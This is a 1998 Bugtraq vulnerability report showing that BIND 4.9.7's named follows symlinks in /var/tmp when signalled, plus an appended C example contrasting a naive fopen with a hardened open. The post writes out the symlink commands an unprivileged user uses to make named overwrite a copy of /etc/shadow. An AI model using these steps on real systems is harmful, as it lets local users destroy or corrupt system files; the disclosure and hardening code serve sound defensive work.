BIND 4.9.7 named follows symlinks, clobbers anything.


X-RDate: Sat, 11 Apr 1998 12:43:40 +0600 (ESD)
Date: Fri, 10 Apr 1998 13:29:20 -0700
From: Joe <[email protected]>
To: [email protected]
Subject: BIND 4.9.7 named follows symlinks, clobbers anything.

[ Posted to BUGTRAQ and comp.protocols.dns.bind ]
[ Standard apologies if this is already known - a search on the Bugtraq
  archive and Deja News comp.protocols.dns.bind doesn't indicate it.]

The new named(8) happily follows symlinks and clobbers any file on the
system when it receives a SIGINT (used for debugging and statistics
gathering). SIGINT dumps the named database to /var/tmp/named_dump.db.

It will also happily append data to any system file when it receives a
SIGIOT. SIGIOT appends named statistics to /var/tmp/named.stats.

This problem is probably recursive to previous versions of named but since
I've already replaced mine I can't confirm that.

On Wed, 8 Apr 1998, Aleph One wrote:

[Snippage of the latest CERT]

>      (Note: the in.named(8) man page mentions that sending a SIGINT to the
>      in.named process will dump the current data base and cache to, by
>      default, /var/tmp/named_dump.db. Some sites may find this useful in
>      looking for self-referential CNAMEs.  Please see the in.named(8) man
>      page for further details.)


This caught my eye in that CERT advisory and after updating my BIND to the
new 4.9.7 ( RedHat 4.2 Linux 2.0.30 i586 ) and reading through the
named(8) man pages I ran a quick check.

[root]# cp /etc/shadow /etc/junk.shadow
[root]# ls -l /etc/junk.shadow
-r--------   1 root     root          992 Apr 10 12:52 junk.shadow

Now as a non-priv user..

[Luser]# ln -s /etc/junk.shadow /var/tmp/named_dump.db
[Luser]# ln -s /etc/junk.shadow /var/tmp/named.stats
[Luser]# logout

(Now if ever root sends a SIGINT or SIGIOT /etc/junk.shadow is toast...)

[root]# kill -SIGIOT [named.pid]

[root]# ls -al /etc/junk.shadow
-r--------   1 root     root         2251 Apr 10 13:00 /etc/junk.shadow

[root]# less /etc/junk.shadow

        someusrr:[removed of course]:10311:-1:-1:-1:-1:-1:-1
        nothrusr:[removed of course]:10316:-1:-1:-1:-1:-1:-1
        +++ Statistics Dump +++ (892238406) Fri Apr 10 13:00:06 1998
        2368    time since boot (secs)
        2368    time since reset (secs)
        0       Unknown query types
<SNIP>

The statistics dump gets appended to any file on the system.

Now for the real horror -

[root]# kill -SIGINT [named.pid]
[root]# ls -l /etc/junk.shadow
-r--------   1 root     root         5249 Apr 10 13:02 /etc/junk.shadow
[root]# less /etc/junk.shadow

        ; Dumped at Fri Apr 10 13:02:40 1998
        ;; ++zone table++
        <SNIP>

No trace of the original remains. Your shadow password file or anything
else on the system is fried.

Enjoy.


--
Joe H.                                  Technical Support
General Support:  [email protected]     Blarg! Online Services, Inc.
Voice:  425/401-9821 or 888/66-BLARG    http://www.blarg.net
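
An added example, not part of the original post and not BIND's own code: a truncating fopen() that follows a planted link, beside an open that refuses it. The helper names, the temporary directory and the `victim`/`dump` files are constructed for the illustration.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* O_NOFOLLOW, mkdtemp, symlink */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (not BIND code): open a dump or stats file without trusting the path. */
int open_dump_safely(const char *path, int append) {
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | (append ? O_APPEND : 0), 0600);
    if (fd < 0) return -1;                  /* ELOOP when the last component is a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid() ||  /* hard link or someone else's file */
        (!append && ftruncate(fd, 0) != 0)) {          /* truncate only after the checks */
        close(fd);
        return -1;
    }
    return fd;
}

long file_size(const char *path) {          /* -1 if the file cannot be stat'ed */
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Constructed scenario: "victim" stands in for /etc/junk.shadow, "dump" for named_dump.db.
   Returns the victim's size after the hardened attempt; *naive_size is its size after fopen "w". */
long demo(long *naive_size) {
    char dir[] = "/tmp/dumpdemoXXXXXX", victim[64], dump[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(dump, sizeof dump, "%s/dump", dir);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("secret\n", f); fclose(f);        /* 7 bytes */
    if (symlink(victim, dump) != 0) return -1;
    int fd = open_dump_safely(dump, 0);     /* refused */
    long hardened = fd < 0 ? file_size(victim) : -2;
    if (fd >= 0) close(fd);
    if ((f = fopen(dump, "w"))) fclose(f);  /* follows the link and truncates the victim */
    *naive_size = file_size(victim);
    unlink(dump); unlink(victim); rmdir(dir);
    return hardened;
}

int main(void) { long n = -1, h = demo(&n); printf("hardened: %ld, naive: %ld\n", h, n); return h != 7; }
```

O_NOFOLLOW only guards the final path component, so writing such files into a directory that only the daemon's user can modify, rather than a world-writable one like /var/tmp, remains the more robust fix.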
